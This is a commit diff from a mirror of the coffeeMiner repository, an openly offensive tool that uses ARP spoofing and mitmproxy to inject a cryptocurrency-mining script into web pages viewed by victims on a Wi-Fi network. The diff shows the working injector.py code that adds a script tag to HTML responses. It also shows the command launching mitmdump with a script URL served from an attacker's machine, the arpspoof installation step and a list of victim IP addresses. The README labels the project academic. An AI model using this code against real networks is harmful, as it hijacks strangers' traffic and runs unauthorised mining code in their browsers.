mirror of
https://github.com/arnaucube/coffeeMiner.git
synced 2026-02-06 18:46:41 +01:00
readme updated, removed comments
This commit is contained in:
11
README.md
11
README.md
@@ -4,6 +4,9 @@ Collaborative (mitm) cryptocurrency mining pool in wifi networks
|
||||
|
||||
**Warning: this project is for academic/research purposes only.**
|
||||
|
||||
A blog post about this project can be read here: http://arnaucode.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html
|
||||
|
||||

|
||||
|
||||
## Concept
|
||||
- Performs a MITM attack to all selected victims
|
||||
@@ -22,12 +25,16 @@ bash install.sh
|
||||
```py
|
||||
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
|
||||
```
|
||||
- run.py
|
||||
- execute coffeeMiner.py
|
||||
```
|
||||
python3 coffeeMiner.py ipgateway
|
||||
```
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
A complete instructions for academic scenario can be found in https://github.com/arnaucode/coffeeMiner/blob/master/virtualbox_scenario_instructions.md
|
||||
|
||||
|
||||
|
||||

|
||||
|
||||
BIN
coffeeMiner-demo-cutted.gif
Normal file
BIN
coffeeMiner-demo-cutted.gif
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 2.5 MiB |
BIN
coffeeMiner-logo-small.png
Normal file
BIN
coffeeMiner-logo-small.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 20 KiB |
BIN
coffeeMiner-network-attack.png
Normal file
BIN
coffeeMiner-network-attack.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 75 KiB |
@@ -25,7 +25,7 @@ for victim in victims:
|
||||
os.system("xterm -hold -e 'python3 httpServer.py' &")
|
||||
|
||||
# start the mitmproxy
|
||||
os.system("~/.local/bin/mitmdump -s 'injector.py http://10.0.2.20:8000/script.js' -T")
|
||||
os.system("~/.local/bin/mitmdump -s 'injector.py http://192.168.1.32:8000/script.js' -T")
|
||||
|
||||
|
||||
'''
|
||||
|
||||
15
injector.py
15
injector.py
@@ -5,29 +5,16 @@ from mitmproxy import ctx, http
|
||||
import argparse
|
||||
|
||||
class Injector:
|
||||
'''
|
||||
def load(self, loader):
|
||||
loader.add_option(
|
||||
"scr_url", str, "", "script_url to inject"
|
||||
)
|
||||
'''
|
||||
def __init__(self, path):
|
||||
self.path = path
|
||||
|
||||
def response(self, flow: http.HTTPFlow) -> None:
|
||||
#print("hola hola hola")
|
||||
#print(self.path)
|
||||
|
||||
if self.path:
|
||||
html = BeautifulSoup(flow.response.content, "html.parser")
|
||||
print(self.path)
|
||||
print(flow.response.headers["content-type"])
|
||||
if flow.response.headers["content-type"] == 'text/html':
|
||||
print("uuuuuu")
|
||||
print(flow.response.headers["content-type"])
|
||||
print("asdf asdf asdf asdf asdf")
|
||||
print("-----")
|
||||
print("mmmmm")
|
||||
script = html.new_tag(
|
||||
"script",
|
||||
src=self.path,
|
||||
@@ -41,5 +28,3 @@ def start():
|
||||
parser.add_argument("path", type=str)
|
||||
args = parser.parse_args()
|
||||
return Injector(args.path)
|
||||
|
||||
#addons = [Injector()]
|
||||
|
||||
@@ -1,5 +1,3 @@
|
||||
#TODO put --yes to all installation commands
|
||||
|
||||
# install arpspoof (dsniff)
|
||||
apt-get -y install dsniff
|
||||
|
||||
|
||||
BIN
network.png
BIN
network.png
Binary file not shown.
|
Before Width: | Height: | Size: 76 KiB |
@@ -1,2 +1,5 @@
|
||||
192.168.1.30
|
||||
192.168.1.31
|
||||
192.168.1.41
|
||||
192.168.1.35
|
||||
192.168.1.45
|
||||
192.168.1.48
|
||||
192.168.1.38
|
||||
|
||||
Reference in New Issue
Block a user